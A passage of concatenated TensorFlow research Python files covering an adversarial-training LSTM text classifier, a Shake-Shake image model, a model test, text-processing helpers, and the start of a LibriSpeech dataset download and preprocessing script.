max_number_of_evaluations=1 if FLAGS.eval_once else None)
else:
result = tf.contrib.training.evaluate_once(
FLAGS.checkpoint_path,
master=FLAGS.master,
scaffold=tf.train.Scaffold(
saver=tf.train.Saver(variables_to_restore)),
eval_ops=names_to_updates.values(),
final_ops=names_to_values,
hooks=[
tf.contrib.training.StopAfterNEvalsHook(num_batches),
tf.train.LoggingTensorHook(names_to_values, at_end=True),
])
if FLAGS.output_file:
with tf.gfile.Open(FLAGS.output_file, 'a') as f:
f.write('%s,%.3f,%.3f\n'
% (FLAGS.eval_name, result['Accuracy'], result['Top5']))
if __name__ == '__main__':
app.run(main)
```
#### File: research/adversarial_text/graphs.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
# Dependency imports
import tensorflow as tf
import adversarial_losses as adv_lib
import inputs as inputs_lib
import layers as layers_lib
flags = tf.app.flags
FLAGS = flags.FLAGS
# Flags governing adversarial training are defined in adversarial_losses.py.
# Classifier
flags.DEFINE_integer('num_classes', 2, 'Number of classes for classification')
# Data path
flags.DEFINE_string('data_dir', '/tmp/IMDB',
'Directory path to preprocessed text dataset.')
flags.DEFINE_string('vocab_freq_path', None,
'Path to pre-calculated vocab frequency data. If '
'None, use FLAGS.data_dir/vocab_freq.txt.')
flags.DEFINE_integer('batch_size', 64, 'Size of the batch.')
flags.DEFINE_integer('num_timesteps', 100, 'Number of timesteps for BPTT')
# Model architechture
flags.DEFINE_bool('bidir_lstm', False, 'Whether to build a bidirectional LSTM.')
flags.DEFINE_bool('single_label', True, 'Whether the sequence has a single '
'label, for optimization.')
flags.DEFINE_integer('rnn_num_layers', 1, 'Number of LSTM layers.')
flags.DEFINE_integer('rnn_cell_size', 512,
'Number of hidden units in the LSTM.')
flags.DEFINE_integer('cl_num_layers', 1,
'Number of hidden layers of classification model.')
flags.DEFINE_integer('cl_hidden_size', 30,
'Number of hidden units in classification layer.')
flags.DEFINE_integer('num_candidate_samples', -1,
'Num samples used in the sampled output layer.')
flags.DEFINE_bool('use_seq2seq_autoencoder', False,
'If True, seq2seq auto-encoder is used to pretrain. '
'If False, standard language model is used.')
# Vocabulary and embeddings
flags.DEFINE_integer('embedding_dims', 256, 'Dimensions of embedded vector.')
flags.DEFINE_integer('vocab_size', 86934,
'The size of the vocaburary. This value '
'should be exactly same as the number of the '
'vocabulary used in dataset. Because the last '
'indexed vocabulary of the dataset preprocessed by '
'my preprocessed code, is always <eos> and here we '
'specify the <eos> with the the index.')
flags.DEFINE_bool('normalize_embeddings', True,
'Normalize word embeddings by vocab frequency')
# Optimization
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate while fine-tuning.')
flags.DEFINE_float('learning_rate_decay_factor', 1.0,
'Learning rate decay factor')
flags.DEFINE_boolean('sync_replicas', False, 'sync_replica or not')
flags.DEFINE_integer('replicas_to_aggregate', 1,
'The number of replicas to aggregate')
# Regularization
flags.DEFINE_float('max_grad_norm', 1.0,
'Clip the global gradient norm to this value.')
flags.DEFINE_float('keep_prob_emb', 1.0, 'keep probability on embedding layer. '
'0.5 is optimal on IMDB with virtual adversarial training.')
flags.DEFINE_float('keep_prob_lstm_out', 1.0,
'keep probability on lstm output.')
flags.DEFINE_float('keep_prob_cl_hidden', 1.0,
'keep probability on classification hidden layer')
def get_model():
if FLAGS.bidir_lstm:
return VatxtBidirModel()
else:
return VatxtModel()
class VatxtModel(object):
"""Constructs training and evaluation graphs.
Main methods: `classifier_training()`, `language_model_training()`,
and `eval_graph()`.
Variable reuse is a critical part of the model, both for sharing variables
between the language model and the classifier, and for reusing variables for
the adversarial loss calculation. To ensure correct variable reuse, all
variables are created in Keras-style layers, wherein stateful layers (i.e.
layers with variables) are represented as callable instances of the Layer
class. Each time the Layer instance is called, it is using the same variables.
All Layers are constructed in the __init__ method and reused in the various
graph-building functions.
"""
def __init__(self, cl_logits_input_dim=None):
self.global_step = tf.train.get_or_create_global_step()
self.vocab_freqs = _get_vocab_freqs()
# Cache VatxtInput objects
self.cl_inputs = None
self.lm_inputs = None
# Cache intermediate Tensors that are reused
self.tensors = {}
# Construct layers which are reused in constructing the LM and
# Classification graphs. Instantiating them all once here ensures that
# variable reuse works correctly.
self.layers = {}
self.layers['embedding'] = layers_lib.Embedding(
FLAGS.vocab_size, FLAGS.embedding_dims, FLAGS.normalize_embeddings,
self.vocab_freqs, FLAGS.keep_prob_emb)
self.layers['lstm'] = layers_lib.LSTM(
FLAGS.rnn_cell_size, FLAGS.rnn_num_layers, FLAGS.keep_prob_lstm_out)
self.layers['lm_loss'] = layers_lib.SoftmaxLoss(
FLAGS.vocab_size,
FLAGS.num_candidate_samples,
self.vocab_freqs,
name='LM_loss')
cl_logits_input_dim = cl_logits_input_dim or FLAGS.rnn_cell_size
self.layers['cl_logits'] = layers_lib.cl_logits_subgraph(
[FLAGS.cl_hidden_size] * FLAGS.cl_num_layers, cl_logits_input_dim,
FLAGS.num_classes, FLAGS.keep_prob_cl_hidden)
@property
def pretrained_variables(self):
return (self.layers['embedding'].trainable_weights +
self.layers['lstm'].trainable_weights)
def classifier_training(self):
loss = self.classifier_graph()
train_op = optimize(loss, self.global_step)
return train_op, loss, self.global_step
def language_model_training(self):
loss = self.language_model_graph()
train_op = optimize(loss, self.global_step)
return train_op, loss, self.global_step
def classifier_graph(self):
"""Constructs classifier graph from inputs to classifier loss.
* Caches the VatxtInput object in `self.cl_inputs`
* Caches tensors: `cl_embedded`, `cl_logits`, `cl_loss`
Returns:
loss: scalar float.
"""
inputs = _inputs('train', pretrain=False)
self.cl_inputs = inputs
embedded = self.layers['embedding'](inputs.tokens)
self.tensors['cl_embedded'] = embedded
_, next_state, logits, loss = self.cl_loss_from_embedding(
embedded, return_intermediates=True)
tf.summary.scalar('classification_loss', loss)
self.tensors['cl_logits'] = logits
self.tensors['cl_loss'] = loss
if FLAGS.single_label:
indices = tf.stack([tf.range(FLAGS.batch_size), inputs.length - 1], 1)
labels = tf.expand_dims(tf.gather_nd(inputs.labels, indices), 1)
weights = tf.expand_dims(tf.gather_nd(inputs.weights, indices), 1)
else:
labels = inputs.labels
weights = inputs.weights
acc = layers_lib.accuracy(logits, labels, weights)
tf.summary.scalar('accuracy', acc)
adv_loss = (self.adversarial_loss() * tf.constant(
FLAGS.adv_reg_coeff, name='adv_reg_coeff'))
tf.summary.scalar('adversarial_loss', adv_loss)
total_loss = loss + adv_loss
with tf.control_dependencies([inputs.save_state(next_state)]):
total_loss = tf.identity(total_loss)
tf.summary.scalar('total_classification_loss', total_loss)
return total_loss
def language_model_graph(self, compute_loss=True):
"""Constructs LM graph from inputs to LM loss.
* Caches the VatxtInput object in `self.lm_inputs`
* Caches tensors: `lm_embedded`
Args:
compute_loss: bool, whether to compute and return the loss or stop after
the LSTM computation.
Returns:
loss: scalar float.
"""
inputs = _inputs('train', pretrain=True)
self.lm_inputs = inputs
return self._lm_loss(inputs, compute_loss=compute_loss)
def _lm_loss(self,
inputs,
emb_key='lm_embedded',
lstm_layer='lstm',
lm_loss_layer='lm_loss',
loss_name='lm_loss',
compute_loss=True):
embedded = self.layers['embedding'](inputs.tokens)
self.tensors[emb_key] = embedded
lstm_out, next_state = self.layers[lstm_layer](embedded, inputs.state,
inputs.length)
if compute_loss:
loss = self.layers[lm_loss_layer](
[lstm_out, inputs.labels, inputs.weights])
with tf.control_dependencies([inputs.save_state(next_state)]):
loss = tf.identity(loss)
tf.summary.scalar(loss_name, loss)
return loss
def eval_graph(self, dataset='test'):
"""Constructs classifier evaluation graph.
Args:
dataset: the labeled dataset to evaluate, {'train', 'test', 'valid'}.
Returns:
eval_ops: dict<metric name, tuple(value, update_op)>
var_restore_dict: dict mapping variable restoration names to variables.
Trainable variables will be mapped to their moving average names.
"""
inputs = _inputs(dataset, pretrain=False)
embedded = self.layers['embedding'](inputs.tokens)
_, next_state, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=inputs, return_intermediates=True)
if FLAGS.single_label:
indices = tf.stack([tf.range(FLAGS.batch_size), inputs.length - 1], 1)
labels = tf.expand_dims(tf.gather_nd(inputs.labels, indices), 1)
weights = tf.expand_dims(tf.gather_nd(inputs.weights, indices), 1)
else:
labels = inputs.labels
weights = inputs.weights
eval_ops = {
'accuracy':
tf.contrib.metrics.streaming_accuracy(
layers_lib.predictions(logits), labels, weights)
}
with tf.control_dependencies([inputs.save_state(next_state)]):
acc, acc_update = eval_ops['accuracy']
acc_update = tf.identity(acc_update)
eval_ops['accuracy'] = (acc, acc_update)
var_restore_dict = make_restore_average_vars_dict()
return eval_ops, var_restore_dict
def cl_loss_from_embedding(self,
embedded,
inputs=None,
return_intermediates=False):
"""Compute classification loss from embedding.
Args:
embedded: 3-D float Tensor [batch_size, num_timesteps, embedding_dim]
inputs: VatxtInput, defaults to self.cl_inputs.
return_intermediates: bool, whether to return intermediate tensors or only
the final loss.
Returns:
If return_intermediates is True:
lstm_out, next_state, logits, loss
Else:
loss
"""
if inputs is None:
inputs = self.cl_inputs
lstm_out, next_state = self.layers['lstm'](embedded, inputs.state,
inputs.length)
if FLAGS.single_label:
indices = tf.stack([tf.range(FLAGS.batch_size), inputs.length - 1], 1)
lstm_out = tf.expand_dims(tf.gather_nd(lstm_out, indices), 1)
labels = tf.expand_dims(tf.gather_nd(inputs.labels, indices), 1)
weights = tf.expand_dims(tf.gather_nd(inputs.weights, indices), 1)
else:
labels = inputs.labels
weights = inputs.weights
logits = self.layers['cl_logits'](lstm_out)
loss = layers_lib.classification_loss(logits, labels, weights)
if return_intermediates:
return lstm_out, next_state, logits, loss
else:
return loss
def adversarial_loss(self):
"""Compute adversarial loss based on FLAGS.adv_training_method."""
def random_perturbation_loss():
return adv_lib.random_perturbation_loss(self.tensors['cl_embedded'],
self.cl_inputs.length,
self.cl_loss_from_embedding)
def adversarial_loss():
return adv_lib.adversarial_loss(self.tensors['cl_embedded'],
self.tensors['cl_loss'],
self.cl_loss_from_embedding)
def virtual_adversarial_loss():
"""Computes virtual adversarial loss.
Uses lm_inputs and constructs the language model graph if it hasn't yet
been constructed.
Also ensures that the LM input states are saved for LSTM state-saving
BPTT.
Returns:
loss: float scalar.
"""
if self.lm_inputs is None:
self.language_model_graph(compute_loss=False)
def logits_from_embedding(embedded, return_next_state=False):
_, next_state, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=self.lm_inputs, return_intermediates=True)
if return_next_state:
return next_state, logits
else:
return logits
next_state, lm_cl_logits = logits_from_embedding(
self.tensors['lm_embedded'], return_next_state=True)
va_loss = adv_lib.virtual_adversarial_loss(
lm_cl_logits, self.tensors['lm_embedded'], self.lm_inputs,
logits_from_embedding)
with tf.control_dependencies([self.lm_inputs.save_state(next_state)]):
va_loss = tf.identity(va_loss)
return va_loss
def combo_loss():
return adversarial_loss() + virtual_adversarial_loss()
adv_training_methods = {
# Random perturbation
'rp': random_perturbation_loss,
# Adversarial training
'at': adversarial_loss,
# Virtual adversarial training
'vat': virtual_adversarial_loss,
# Both at and vat
'atvat': combo_loss,
'': lambda: tf.constant(0.),
None: lambda: tf.constant(0.),
}
with tf.name_scope('adversarial_loss'):
return adv_training_methods[FLAGS.adv_training_method]()
class VatxtBidirModel(VatxtModel):
"""Extension of VatxtModel that supports bidirectional input."""
def __init__(self):
super(VatxtBidirModel,
self).__init__(cl_logits_input_dim=FLAGS.rnn_cell_size * 2)
# Reverse LSTM and LM loss for bidirectional models
self.layers['lstm_reverse'] = layers_lib.LSTM(
FLAGS.rnn_cell_size,
FLAGS.rnn_num_layers,
FLAGS.keep_prob_lstm_out,
name='LSTM_Reverse')
self.layers['lm_loss_reverse'] = layers_lib.SoftmaxLoss(
FLAGS.vocab_size,
FLAGS.num_candidate_samples,
self.vocab_freqs,
name='LM_loss_reverse')
@property
def pretrained_variables(self):
variables = super(VatxtBidirModel, self).pretrained_variables
variables.extend(self.layers['lstm_reverse'].trainable_weights)
return variables
def classifier_graph(self):
"""Constructs classifier graph from inputs to classifier loss.
* Caches the VatxtInput objects in `self.cl_inputs`
* Caches tensors: `cl_embedded` (tuple of forward and reverse), `cl_logits`,
`cl_loss`
Returns:
loss: scalar float.
"""
inputs = _inputs('train', pretrain=False, bidir=True)
self.cl_inputs = inputs
f_inputs, _ = inputs
# Embed both forward and reverse with a shared embedding
embedded = [self.layers['embedding'](inp.tokens) for inp in inputs]
self.tensors['cl_embedded'] = embedded
_, next_states, logits, loss = self.cl_loss_from_embedding(
embedded, return_intermediates=True)
tf.summary.scalar('classification_loss', loss)
self.tensors['cl_logits'] = logits
self.tensors['cl_loss'] = loss
acc = layers_lib.accuracy(logits, f_inputs.labels, f_inputs.weights)
tf.summary.scalar('accuracy', acc)
adv_loss = (self.adversarial_loss() * tf.constant(
FLAGS.adv_reg_coeff, name='adv_reg_coeff'))
tf.summary.scalar('adversarial_loss', adv_loss)
total_loss = loss + adv_loss
saves = [inp.save_state(state) for (inp, state) in zip(inputs, next_states)]
with tf.control_dependencies(saves):
total_loss = tf.identity(total_loss)
tf.summary.scalar('total_classification_loss', total_loss)
return total_loss
def language_model_graph(self, compute_loss=True):
"""Constructs forward and reverse LM graphs from inputs to LM losses.
* Caches the VatxtInput objects in `self.lm_inputs`
* Caches tensors: `lm_embedded`, `lm_embedded_reverse`
Args:
compute_loss: bool, whether to compute and return the loss or stop after
the LSTM computation.
Returns:
loss: scalar float, sum of forward and reverse losses.
"""
inputs = _inputs('train', pretrain=True, bidir=True)
self.lm_inputs = inputs
f_inputs, r_inputs = inputs
f_loss = self._lm_loss(f_inputs, compute_loss=compute_loss)
r_loss = self._lm_loss(
r_inputs,
emb_key='lm_embedded_reverse',
lstm_layer='lstm_reverse',
lm_loss_layer='lm_loss_reverse',
loss_name='lm_loss_reverse',
compute_loss=compute_loss)
if compute_loss:
return f_loss + r_loss
def eval_graph(self, dataset='test'):
"""Constructs classifier evaluation graph.
Args:
dataset: the labeled dataset to evaluate, {'train', 'test', 'valid'}.
Returns:
eval_ops: dict<metric name, tuple(value, update_op)>
var_restore_dict: dict mapping variable restoration names to variables.
Trainable variables will be mapped to their moving average names.
"""
inputs = _inputs(dataset, pretrain=False, bidir=True)
embedded = [self.layers['embedding'](inp.tokens) for inp in inputs]
_, next_states, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=inputs, return_intermediates=True)
f_inputs, _ = inputs
eval_ops = {
'accuracy':
tf.contrib.metrics.streaming_accuracy(
layers_lib.predictions(logits), f_inputs.labels,
f_inputs.weights)
}
# Save states on accuracy update
saves = [inp.save_state(state) for (inp, state) in zip(inputs, next_states)]
with tf.control_dependencies(saves):
acc, acc_update = eval_ops['accuracy']
acc_update = tf.identity(acc_update)
eval_ops['accuracy'] = (acc, acc_update)
var_restore_dict = make_restore_average_vars_dict()
return eval_ops, var_restore_dict
def cl_loss_from_embedding(self,
embedded,
inputs=None,
return_intermediates=False):
"""Compute classification loss from embedding.
Args:
embedded: Length 2 tuple of 3-D float Tensor
[batch_size, num_timesteps, embedding_dim].
inputs: Length 2 tuple of VatxtInput, defaults to self.cl_inputs.
return_intermediates: bool, whether to return intermediate tensors or only
the final loss.
Returns:
If return_intermediates is True:
lstm_out, next_states, logits, loss
Else:
loss
"""
if inputs is None:
inputs = self.cl_inputs
out = []
for (layer_name, emb, inp) in zip(['lstm', 'lstm_reverse'], embedded,
inputs):
out.append(self.layers[layer_name](emb, inp.state, inp.length))
lstm_outs, next_states = zip(*out)
# Concatenate output of forward and reverse LSTMs
lstm_out = tf.concat(lstm_outs, 1)
logits = self.layers['cl_logits'](lstm_out)
f_inputs, _ = inputs # pylint: disable=unpacking-non-sequence
loss = layers_lib.classification_loss(logits, f_inputs.labels,
f_inputs.weights)
if return_intermediates:
return lstm_out, next_states, logits, loss
else:
return loss
def adversarial_loss(self):
"""Compute adversarial loss based on FLAGS.adv_training_method."""
def random_perturbation_loss():
return adv_lib.random_perturbation_loss_bidir(self.tensors['cl_embedded'],
self.cl_inputs[0].length,
self.cl_loss_from_embedding)
def adversarial_loss():
return adv_lib.adversarial_loss_bidir(self.tensors['cl_embedded'],
self.tensors['cl_loss'],
self.cl_loss_from_embedding)
def virtual_adversarial_loss():
"""Computes virtual adversarial loss.
Uses lm_inputs and constructs the language model graph if it hasn't yet
been constructed.
Also ensures that the LM input states are saved for LSTM state-saving
BPTT.
Returns:
loss: float scalar.
"""
if self.lm_inputs is None:
self.language_model_graph(compute_loss=False)
def logits_from_embedding(embedded, return_next_state=False):
_, next_states, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=self.lm_inputs, return_intermediates=True)
if return_next_state:
return next_states, logits
else:
return logits
lm_embedded = (self.tensors['lm_embedded'],
self.tensors['lm_embedded_reverse'])
next_states, lm_cl_logits = logits_from_embedding(
lm_embedded, return_next_state=True)
va_loss = adv_lib.virtual_adversarial_loss_bidir(
lm_cl_logits, lm_embedded, self.lm_inputs, logits_from_embedding)
saves = [
inp.save_state(state)
for (inp, state) in zip(self.lm_inputs, next_states)
]
with tf.control_dependencies(saves):
va_loss = tf.identity(va_loss)
return va_loss
def combo_loss():
return adversarial_loss() + virtual_adversarial_loss()
adv_training_methods = {
# Random perturbation
'rp': random_perturbation_loss,
# Adversarial training
'at': adversarial_loss,
# Virtual adversarial training
'vat': virtual_adversarial_loss,
# Both at and vat
'atvat': combo_loss,
'': lambda: tf.constant(0.),
None: lambda: tf.constant(0.),
}
with tf.name_scope('adversarial_loss'):
return adv_training_methods[FLAGS.adv_training_method]()
def _inputs(dataset='train', pretrain=False, bidir=False):
return inputs_lib.inputs(
data_dir=FLAGS.data_dir,
phase=dataset,
bidir=bidir,
pretrain=pretrain,
use_seq2seq=pretrain and FLAGS.use_seq2seq_autoencoder,
state_size=FLAGS.rnn_cell_size,
num_layers=FLAGS.rnn_num_layers,
batch_size=FLAGS.batch_size,
unroll_steps=FLAGS.num_timesteps,
eos_id=FLAGS.vocab_size - 1)
def _get_vocab_freqs():
"""Returns vocab frequencies.
Returns:
List of integers, length=FLAGS.vocab_size.
Raises:
ValueError: if the length of the frequency file is not equal to the vocab
size, or if the file is not found.
"""
path = FLAGS.vocab_freq_path or os.path.join(FLAGS.data_dir, 'vocab_freq.txt')
if tf.gfile.Exists(path):
with tf.gfile.Open(path) as f:
# Get pre-calculated frequencies of words.
reader = csv.reader(f, quoting=csv.QUOTE_NONE)
freqs = [int(row[-1]) for row in reader]
if len(freqs) != FLAGS.vocab_size:
raise ValueError('Frequency file length %d != vocab size %d' %
(len(freqs), FLAGS.vocab_size))
else:
if FLAGS.vocab_freq_path:
raise ValueError('vocab_freq_path not found')
freqs = [1] * FLAGS.vocab_size
return freqs
def make_restore_average_vars_dict():
"""Returns dict mapping moving average names to variables."""
var_restore_dict = {}
variable_averages = tf.train.ExponentialMovingAverage(0.999)
for v in tf.global_variables():
if v in tf.trainable_variables():
name = variable_averages.average_name(v)
else:
name = v.op.name
var_restore_dict[name] = v
return var_restore_dict
def optimize(loss, global_step):
return layers_lib.optimize(
loss, global_step, FLAGS.max_grad_norm, FLAGS.learning_rate,
FLAGS.learning_rate_decay_factor, FLAGS.sync_replicas,
FLAGS.replicas_to_aggregate, FLAGS.task)
```
#### File: research/autoaugment/shake_shake.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import custom_ops as ops
import tensorflow as tf
def _shake_shake_skip_connection(x, output_filters, stride):
"""Adds a residual connection to the filter x for the shake-shake model."""
curr_filters = int(x.shape[3])
if curr_filters == output_filters:
return x
stride_spec = ops.stride_arr(stride, stride)
# Skip path 1
path1 = tf.nn.avg_pool(
x, [1, 1, 1, 1], stride_spec, 'VALID', data_format='NHWC')
path1 = ops.conv2d(path1, int(output_filters / 2), 1, scope='path1_conv')
# Skip path 2
# First pad with 0's then crop
pad_arr = [[0, 0], [0, 1], [0, 1], [0, 0]]
path2 = tf.pad(x, pad_arr)[:, 1:, 1:, :]
concat_axis = 3
path2 = tf.nn.avg_pool(
path2, [1, 1, 1, 1], stride_spec, 'VALID', data_format='NHWC')
path2 = ops.conv2d(path2, int(output_filters / 2), 1, scope='path2_conv')
# Concat and apply BN
final_path = tf.concat(values=[path1, path2], axis=concat_axis)
final_path = ops.batch_norm(final_path, scope='final_path_bn')
return final_path
def _shake_shake_branch(x, output_filters, stride, rand_forward, rand_backward,
is_training):
"""Building a 2 branching convnet."""
x = tf.nn.relu(x)
x = ops.conv2d(x, output_filters, 3, stride=stride, scope='conv1')
x = ops.batch_norm(x, scope='bn1')
x = tf.nn.relu(x)
x = ops.conv2d(x, output_filters, 3, scope='conv2')
x = ops.batch_norm(x, scope='bn2')
if is_training:
x = x * rand_backward + tf.stop_gradient(x * rand_forward -
x * rand_backward)
else:
x *= 1.0 / 2
return x
def _shake_shake_block(x, output_filters, stride, is_training):
"""Builds a full shake-shake sub layer."""
batch_size = tf.shape(x)[0]
# Generate random numbers for scaling the branches
rand_forward = [
tf.random_uniform(
[batch_size, 1, 1, 1], minval=0, maxval=1, dtype=tf.float32)
for _ in range(2)
]
rand_backward = [
tf.random_uniform(
[batch_size, 1, 1, 1], minval=0, maxval=1, dtype=tf.float32)
for _ in range(2)
]
# Normalize so that all sum to 1
total_forward = tf.add_n(rand_forward)
total_backward = tf.add_n(rand_backward)
rand_forward = [samp / total_forward for samp in rand_forward]
rand_backward = [samp / total_backward for samp in rand_backward]
zipped_rand = zip(rand_forward, rand_backward)
branches = []
for branch, (r_forward, r_backward) in enumerate(zipped_rand):
with tf.variable_scope('branch_{}'.format(branch)):
b = _shake_shake_branch(x, output_filters, stride, r_forward, r_backward,
is_training)
branches.append(b)
res = _shake_shake_skip_connection(x, output_filters, stride)
return res + tf.add_n(branches)
def _shake_shake_layer(x, output_filters, num_blocks, stride,
is_training):
"""Builds many sub layers into one full layer."""
for block_num in range(num_blocks):
curr_stride = stride if (block_num == 0) else 1
with tf.variable_scope('layer_{}'.format(block_num)):
x = _shake_shake_block(x, output_filters, curr_stride,
is_training)
return x
def build_shake_shake_model(images, num_classes, hparams, is_training):
"""Builds the Shake-Shake model.
Build the Shake-Shake model from https://arxiv.org/abs/1705.07485.
Args:
images: Tensor of images that will be fed into the Wide ResNet Model.
num_classes: Number of classed that the model needs to predict.
hparams: tf.HParams object that contains additional hparams needed to
construct the model. In this case it is the `shake_shake_widen_factor`
that is used to determine how many filters the model has.
is_training: Is the model training or not.
Returns:
The logits of the Shake-Shake model.
"""
depth = 26
k = hparams.shake_shake_widen_factor # The widen factor
n = int((depth - 2) / 6)
x = images
x = ops.conv2d(x, 16, 3, scope='init_conv')
x = ops.batch_norm(x, scope='init_bn')
with tf.variable_scope('L1'):
x = _shake_shake_layer(x, 16 * k, n, 1, is_training)
with tf.variable_scope('L2'):
x = _shake_shake_layer(x, 32 * k, n, 2, is_training)
with tf.variable_scope('L3'):
x = _shake_shake_layer(x, 64 * k, n, 2, is_training)
x = tf.nn.relu(x)
x = ops.global_avg_pool(x)
# Fully connected
logits = ops.fc(x, num_classes)
return logits
```
#### File: entropy_coder/all_models/all_models_test.py
```python
import tensorflow as tf
# pylint: disable=unused-import
import all_models
# pylint: enable=unused-import
from entropy_coder.model import model_factory
class AllModelsTest(tf.test.TestCase):
def testBuildModelForTraining(self):
factory = model_factory.GetModelRegistry()
model_names = factory.GetAvailableModels()
for m in model_names:
tf.reset_default_graph()
global_step = tf.Variable(tf.zeros([], dtype=tf.int64),
trainable=False,
name='global_step')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)
batch_size = 3
height = 40
width = 20
depth = 5
binary_codes = tf.placeholder(dtype=tf.float32,
shape=[batch_size, height, width, depth])
# Create a model with the default configuration.
print('Creating model: {}'.format(m))
model = factory.CreateModel(m)
model.Initialize(global_step,
optimizer,
model.GetConfigStringForUnitTest())
self.assertTrue(model.loss is None, 'model: {}'.format(m))
self.assertTrue(model.train_op is None, 'model: {}'.format(m))
self.assertTrue(model.average_code_length is None, 'model: {}'.format(m))
# Build the Tensorflow graph corresponding to the model.
model.BuildGraph(binary_codes)
self.assertTrue(model.loss is not None, 'model: {}'.format(m))
self.assertTrue(model.average_code_length is not None,
'model: {}'.format(m))
if model.train_op is None:
print('Model {} is not trainable'.format(m))
if __name__ == '__main__':
tf.test.main()
```
#### File: cvt_text/corpus_processing/example.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from base import embeddings
CONTRACTION_WORDS = set(w + 'n' for w in
['do', 'does', 'did', 'is', 'are', 'was', 'were', 'has',
'have', 'had', 'could', 'would', 'should', 'ca', 'wo',
'ai', 'might'])
class Example(object):
def __init__(self, words, word_vocab, char_vocab):
words = words[:]
# Fix inconsistent tokenization between datasets
for i in range(len(words)):
if (words[i].lower() == '\'t' and i > 0 and
words[i - 1].lower() in CONTRACTION_WORDS):
words[i] = words[i - 1][-1] + words[i]
words[i - 1] = words[i - 1][:-1]
self.words = ([embeddings.START] +
[word_vocab[embeddings.normalize_word(w)] for w in words] +
[embeddings.END])
self.chars = ([[embeddings.MISSING]] +
[[char_vocab[c] for c in embeddings.normalize_chars(w)]
for w in words] +
[[embeddings.MISSING]])
def __repr__(self,):
inv_char_vocab = embeddings.get_inv_char_vocab()
return ' '.join([''.join([inv_char_vocab[c] for c in w])
for w in self.chars])
```
#### File: task_specific/word_level/word_level_scorer.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from corpus_processing import scorer
class WordLevelScorer(scorer.Scorer):
__metaclass__ = abc.ABCMeta
def __init__(self):
super(WordLevelScorer, self).__init__()
self._total_loss = 0
self._total_words = 0
self._examples = []
self._preds = []
def update(self, examples, predictions, loss):
super(WordLevelScorer, self).update(examples, predictions, loss)
n_words = 0
for example, preds in zip(examples, predictions):
self._examples.append(example)
self._preds.append(list(preds)[1:len(example.words) - 1])
n_words += len(example.words) - 2
self._total_loss += loss * n_words
self._total_words += n_words
def get_loss(self):
return self._total_loss / max(1, self._total_words)
```
#### File: deep_speech/data/download.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import codecs
import fnmatch
import os
import sys
import tarfile
import tempfile
import unicodedata
from absl import app as absl_app
from absl import flags as absl_flags
import pandas
from six.moves import urllib
from sox import Transformer
import tensorflow as tf
LIBRI_SPEECH_URLS = {
"train-clean-100":
"http://www.openslr.org/resources/12/train-clean-100.tar.gz",
"train-clean-360":
"http://www.openslr.org/resources/12/train-clean-360.tar.gz",
"train-other-500":
"http://www.openslr.org/resources/12/train-other-500.tar.gz",
"dev-clean":
"http://www.openslr.org/resources/12/dev-clean.tar.gz",
"dev-other":
"http://www.openslr.org/resources/12/dev-other.tar.gz",
"test-clean":
"http://www.openslr.org/resources/12/test-clean.tar.gz",
"test-other":
"http://www.openslr.org/resources/12/test-other.tar.gz"
}
def download_and_extract(directory, url):
"""Download and extract the given split of dataset.
Args:
directory: the directory where to extract the tarball.
url: the url to download the data file.
"""
if not tf.gfile.Exists(directory):
tf.gfile.MakeDirs(directory)
_, tar_filepath = tempfile.mkstemp(suffix=".tar.gz")
try:
tf.logging.info("Downloading %s to %s" % (url, tar_filepath))
def _progress(count, block_size, total_size):
sys.stdout.write("\r>> Downloading {} {:.1f}%".format(
tar_filepath, 100.0 * count * block_size / total_size))
sys.stdout.flush()
urllib.request.urlretrieve(url, tar_filepath, _progress)
print()
statinfo = os.stat(tar_filepath)
tf.logging.info(
"Successfully downloaded %s, size(bytes): %d" % (url, statinfo.st_size))
with tarfile.open(tar_filepath, "r") as tar:
tar.extractall(directory)
finally:
tf.gfile.Remove(tar_filepath)
def convert_audio_and_split_transcript(input_dir, source_name, target_name,
output_dir, output_file):
"""Convert FLAC to WAV and split the transcript.
For audio file, convert the format from FLAC to WAV using the sox.Transformer
library.
For transcripts, each line contains the sequence id and the corresponding
transcript (separated by space):
Input data format: seq-id transcript_of_seq-id
For example:
1-2-0 transcript_of_1-2-0.flac
1-2-1 transcript_of_1-2-1.flac
...
Each sequence id has a corresponding .flac file.
Parse the transcript file and generate a new csv file which has three columns:
"wav_filename": the absolute path to a wav file.
"wav_filesize": the size of the corresponding wav file.
"transcript": the transcript for this audio segement.
Args:
input_dir: the directory which holds the input dataset.
source_name: the name of the specified dataset. e.g. test-clean
target_name: the directory name for the newly generated audio files.
e.g. test-clean-wav
output_dir: the directory to place the newly generated csv files.
output_file: the name of the newly generated csv file. e.g. test-clean.csv
"""
tf.logging.info("Preprocessing audio and transcript for %s" % source_name)
source_dir = os.path.join(input_dir, source_name)
target_dir = os.path.join(input_dir, target_name)
if not tf.gfile.Exists(target_dir):
tf.gfile.MakeDirs(target_dir)
files = []
tfm = Transformer()
# Convert all FLAC file into WAV format. At the same time, generate the csv
# file.
for root, _, filenames in tf.gfile.Walk(source_dir):
for filename in fnmatch.filter(filenames, "*.trans.txt"):
trans_file = os.path.join(root, filename)
with codecs.open(trans_file, "r", "utf-8") as fin:
for line in fin:
seqid, transcript = line.split(" ", 1)
# We do a encode-decode transformation here because the output type
# of encode is a bytes object, we need convert it to string.
transcript = unicodedata.normalize("NFKD", transcript).encode(
"ascii", "ignore").decode("ascii", "ignore").strip().lower()
# Convert FLAC to WAV.
flac_file = os.path.join(root, seqid + ".flac")
wav_file = os.path.join(target_dir, seqid + ".wav")
if not tf.gfile.Exists(wav_file):
tfm.build(flac_file, wav_file)
wav_filesize = os.path.getsize(wav_file)
files.append((os.path.abspath(wav_file), wav_filesize, transcript))
# Write to CSV file which contains three columns:
# "wav_filename", "wav_filesize", "transcript".
csv_file_path = os.path.join(output_dir, output_file)
df = pandas.DataFrame(
data=files, columns=["wav_filename", "wav_filesize", "transcript"])
df.to_csv(csv_file_path, index=False, sep="\t")
tf.logging.info("Successfully generated csv file {}".format(csv_file_path))
def download_and_process_datasets(directory, datasets):
